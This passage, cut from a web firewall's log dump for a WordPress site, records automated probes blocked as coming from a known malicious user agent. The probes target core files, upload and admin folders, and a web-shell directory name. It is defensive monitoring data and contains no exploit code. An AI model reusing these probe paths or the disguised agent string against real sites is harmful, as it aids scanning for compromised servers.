SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9oZWFkZXItZW1iZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134097,1699994986.894685,1699994986.885000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134047,1699932794.354499,1699932794.345700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/footer.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9mb290ZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134048,1699932791.776601,1699932791.754900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/footer-embed.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9mb290ZXItZW1iZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134049,1699932775.497023,1699932775.475300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/embed.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9lbWJlZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134096,1699994988.457843,1699994988.449200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/.well-knownold/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134050,1699932758.830789,1699932758.822000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/embed-content.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9lbWJlZC1jb250ZW50LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134051,1699932752.342697,1699932752.334100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/embed-404.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9lbWJlZC00MDQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134052,1699932747.124038,1699932747.115200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/comments.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9jb21tZW50cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134053,1699932743.376760,1699932743.366600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134095,1699994990.009806,1699994989.994800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134054,1699932735.039550,1699932735.025700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134055,1699932728.904855,1699932728.890900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine/class-wp-style-engine.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS9jbGFzcy13cC1zdHlsZS1lbmdpbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134056,1699932725.262598,1699932725.253300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine/class-wp-style-engine-processor.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS9jbGFzcy13cC1zdHlsZS1lbmdpbmUtcHJvY2Vzc29yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134094,1699994993.333491,1699994993.324800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134057,1699932721.005415,1699932720.996200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine/class-wp-style-engine-css-rules-store.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS9jbGFzcy13cC1zdHlsZS1lbmdpbmUtY3NzLXJ1bGVzLXN0b3JlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134058,1699932717.205392,1699932717.189300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine/class-wp-style-engine-css-rule.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS9jbGFzcy13cC1zdHlsZS1lbmdpbmUtY3NzLXJ1bGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134059,1699932711.781631,1699932711.772700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine/class-wp-style-engine-css-declarations.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS9jbGFzcy13cC1zdHlsZS1lbmdpbmUtY3NzLWRlY2xhcmF0aW9ucy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134093,1699994994.783970,1699994994.775400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/upload/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134060,1699932707.331641,1699932707.309900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134061,1699932692.840360,1699932692.831700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134062,1699932687.332341,1699932687.311100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/SodiumException.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL1NvZGl1bUV4Y2VwdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134092,1699994996.765195,1699994996.756400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134063,1699932675.033542,1699932675.024900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/File.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL0ZpbGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134064,1699932672.328413,1699932672.319700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/Crypto32.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL0NyeXB0bzMyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134090,1699995000.310594,1699995000.301900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134065,1699932667.453466,1699932667.440300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/Crypto.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 